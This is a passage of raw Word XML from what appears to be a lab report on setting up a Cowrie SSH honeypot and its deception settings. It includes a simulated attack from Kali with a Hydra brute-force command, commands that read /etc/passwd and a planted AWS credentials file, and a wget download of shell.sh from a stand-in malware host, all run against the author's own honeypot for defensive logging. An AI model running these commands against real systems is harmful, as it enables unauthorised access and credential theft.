          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-persistent save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB2D8D" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="3EE5BC68" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="645B3775" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc231686554"/>
      <w:r>
        <w:t>Step 12 — Simulate an Attack from Kali to Generate Log Data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="1A6B5CAC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The honeypot operates on a private VM network and will not receive organic internet traffic. A controlled simulation from the Kali attacker machine generates the log data for SIEM analysis — a standard technique in security lab environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CEEBCE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="1E72AE81" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="543915F3" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12a — Create a password list on Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BFC7F"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cat &gt; ~/passwords.txt &lt;&lt; 'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE25939"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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6985A550"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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4723E473"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123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FFE951"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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A6A496"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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E04F85E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="0DCC45E0" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB8FAE1" w14:textId="4D63EEC8" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12b — Run brute force attack from Kali against Cowrie on port 2222:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467D3D37"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hydra -l root -P ~/passwords.txt ssh://192.168.56.22:2222 -t 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA238A7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Hydra cycles through each password and reports successful credentials. Expected output confirms login: root password: root and variants as valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E9827B" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACCF28E" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE31BED" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6364380E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="16C765AD" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>12c — Log into the honeypot and execute post-login commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A946999"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ssh -p 2222 root@192.168.56.22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA404ED" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When prompted for password, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>enter:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> root. The session lands in Cowrie's emulated shell. Execute the following commands to replicate the attacker playbook:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715DB2C4"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uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329FEBA9"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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C207FF2"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cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D940AE"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cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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mysql.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A931DE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cat /home/admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF7785"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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://malware.example.com/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C8F72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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BEFBE6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="4ED260C6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12d — Verify capture in Cowrie log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D76AF0"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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2E5F51"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grep "login attempt" ~/cowrie/var/log/cowrie/cowrie.log | tail -10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B7014"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grep "CMD" ~/cowrie/var/log/cowrie/cowrie.log | tail -10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D79E4E" w14:textId="5AB1F605" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Login attempt and CMD entries in the output confirm the honeypot is capturing attacker activity and the data pipeline is ready for SIEM ingestion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE11E07" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="3649F0F3" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc231686555"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2.2  Setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Confirmation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51D0165B"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4DAD5E3D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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0F051A56" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="1DF62C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6F674FB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hosting Method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F28572" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VirtualBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="5891FE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069214" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu Server 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1EB851" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="74519F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D69C94" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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41BF39" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu Server 22.04 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="131C13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50DD5D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cowrie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4938FE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2.9.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>19.dev</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>24+g3a66dd2d3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="2675F0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72AF464" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Installation Date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5EE6A70" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>05/05/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="5E1CAD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965A99" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cowrie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1E6BDC" w14:textId="440C66C8" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cowrie is running (PID: 8925)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="53D79E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D31C077" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port Redirect Active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8B14602" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Yes — port 22 → 2222 via iptables PREROUTING</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="47D33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D85FED" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>First Connection Logged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E4C7D6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2026-06-05 22:38:15 from 192.168.56.26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C85C7F1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="6E73B0E7" w14:textId="77777777" w:rsidR="00AF0E5B" w:rsidRDefault="00AF0E5B"/>
    <w:p w14:paraId="1F2C67A9" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="7746C4B1" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="777E5A5D" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="32AC4936" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="399634FE" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="0E76585F" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="03542C5D" w14:textId="40D6F423" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc231686556"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 Deployment Observations &amp; Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="4F36AE05" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Deployment confirmed what threat intelligence reports consistently document — automated attackers do not wait. The simulated attack launched from 192.168.56.26 generated 65 events logged at 22:38:15 on 05/06/2026, replicating the real-world reality where Rapid7 confirms internet-facing SSH services are probed within 90 seconds of exposure. On a public cloud IP, this honeypot would have attracted genuine threat actors within minutes — no advertisement necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBEE589" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The data reinforces a critical operational truth: any SSH service exposed with default credentials is not a question of if it will be compromised, but when — measured in minutes, not days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5978A2F1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>From a technical standpoint, the deployment surfaced an important defensive insight — legacy iptables rules from a previous installation silently redirected traffic without generating diagnostic errors, demonstrating how residual firewall configurations can undermine new security controls without detection. Systematic firewall auditing before deploying any security infrastructure is not optional — it is foundational.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040FE03B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7019E164" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc231686557"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Deception Layer Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="18847AC7" w14:textId="1160C7A5" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc231686558"/>
      <w:r>
        <w:t>3.1 Step-by-Step Deception Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="2D66F046" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc231686559"/>
      <w:r>
        <w:t>Step 1 — Configure Realistic Hostname</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="611C67F2"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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CCA9CD"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nano ~/cowrie/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cowrie.cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B9ACCC0" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Set the hostname to emulate a corporate file server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CADD331"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hostname = fileserver-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BD8CB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="77089CFD" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc231686560"/>
      <w:r>
        <w:t>Step 2 — Spoof the SSH Version Banner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="207B8D6C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the same </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cowrie.cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file, set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EED3749"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version = SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6EB733" w14:textId="39883862" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This version string matches the SSH banner of a genuine Ubuntu 20.04 production server, ensuring the honeypot is indistinguishable from legitimate infrastructure during passive network reconnaissance and active service fingerprinting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B76E48A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="6B2A40C5" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc231686561"/>
      <w:r>
        <w:t>Step 3 — Add Fake Login Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="4F03C013"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nano ~/cowrie/etc/userdb.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC7224" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add the following credential entries (format: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>username:uid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3B5BB"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root:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0:root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="04BF9AEF"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root:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0:password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="45A767B0" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root:0:123456</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4241B2DD"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root:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0:admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6D779FA6"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admin:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1000:admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21349B91"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admin:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1000:password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A40D1AE"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ubuntu:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1000:ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23B8EF68" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="08C5318A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc231686562"/>
      <w:r>
        <w:t>Step 4 — Plant Fake Credential Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="100A3CEC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4a — Create a fake MySQL configuration file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFEFA4"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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
